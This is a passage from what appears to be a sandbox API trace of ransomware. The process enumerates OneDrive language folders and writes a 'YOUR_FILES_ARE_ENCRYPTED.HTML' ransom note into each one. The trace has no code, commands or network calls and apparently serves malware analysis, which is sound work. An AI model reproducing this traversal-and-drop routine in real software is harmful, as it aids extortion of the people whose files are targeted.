ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.892] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.892] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.893] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.893] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.893] lstrlenW (lpString=".mui") returned 4 [0162.893] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.893] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.893] FindClose (in: 
hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.893] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ug\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.894] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.896] CloseHandle (hObject=0x5ac) returned 1 [0162.897] GetProcessHeap () returned 0x270000 [0162.898] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.898] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ug-arab", cAlternateFileName="")) returned 1 [0162.898] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab") returned 79 [0162.898] GetProcessHeap () returned 0x270000 [0162.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x10000) returned 0x74d2010 [0162.898] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab" [0162.898] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\*" [0162.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.898] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.898] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.898] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.898] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.898] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.898] lstrlenW (lpString=".mui") returned 4 [0162.898] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.899] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac5cce50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac5cce50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.899] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.899] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.899] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ug-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.899] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.901] CloseHandle (hObject=0x5ac) returned 1 [0162.902] GetProcessHeap () returned 0x270000 [0162.902] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.903] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="uk", cAlternateFileName="")) returned 1 [0162.903] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk") returned 74 [0162.903] GetProcessHeap () returned 0x270000 [0162.903] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.903] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk" [0162.903] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\*" [0162.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.904] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac5cce50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.904] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x0, 
dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.904] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.904] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.904] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.904] lstrlenW (lpString=".mui") returned 4 [0162.904] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.904] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac6fd950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac6fd950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.904] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.904] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\uk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
hTemplateFile=0x0) returned 0x5ac [0162.905] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.907] CloseHandle (hObject=0x5ac) returned 1 [0162.907] GetProcessHeap () returned 0x270000 [0162.908] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.908] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ur", cAlternateFileName="")) returned 1 [0162.908] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur") returned 74 [0162.908] GetProcessHeap () returned 0x270000 [0162.908] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.908] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur" [0162.908] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\*" [0162.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.908] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac6fd950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.909] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.909] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\FileSync.LocalizedResources.dll.mui") returned 110 
[0162.909] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.909] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.909] lstrlenW (lpString=".mui") returned 4 [0162.909] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.909] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac8545b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac8545b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.909] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.909] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ur\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ur\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.909] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.911] CloseHandle (hObject=0x5ac) returned 1 [0162.912] GetProcessHeap () returned 
0x270000 [0162.913] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.913] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="uz-latn-uz", cAlternateFileName="UZ-LAT~1")) returned 1 [0162.913] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz") returned 82 [0162.913] GetProcessHeap () returned 0x270000 [0162.913] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.913] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz" [0162.913] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\*" [0162.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac8545b0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.913] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac8545b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.913] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac9850b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac9850b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.913] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\uz-latn-uz\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.913] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.913] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.913] lstrlenW (lpString=".mui") returned 4 [0162.913] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") 
